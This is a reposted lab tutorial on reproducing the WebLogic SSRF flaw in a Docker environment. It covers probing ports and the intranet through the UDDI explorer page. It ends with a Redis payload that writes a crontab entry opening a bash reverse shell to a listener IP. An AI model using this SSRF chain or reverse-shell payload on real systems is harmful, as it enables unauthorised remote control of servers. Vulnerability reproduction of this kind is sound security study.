Home  >  Article  >  Operation and Maintenance  >  How to Reproduce Weblogic SSRF Vulnerability

How to Reproduce Weblogic SSRF Vulnerability

王林
王林forward
2023-05-14 20:04:041342browse

1. Use docker to build an environment

Docker installation and environment building tutorial: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Access port 7001如何实现Weblogic SSRF漏洞复现

2. Vulnerability reproduction steps

1. Vulnerability page/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2. Check IBM.

如何实现Weblogic SSRF漏洞复现

It is found that there is a connection, so there may be ssrf.

3. Use burp suite to capture packets. Click Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4. Modify the connection of operator parameters

如何实现Weblogic SSRF漏洞复现

##5. Access result

Accessing a non-existing port returns could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

Accessing an existing port returns a status code

如何实现Weblogic SSRF漏洞复现

Access the intranet

如何实现Weblogic SSRF漏洞复现

Use redis to rebound the shell payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

The above is the detailed content of How to Reproduce Weblogic SSRF Vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete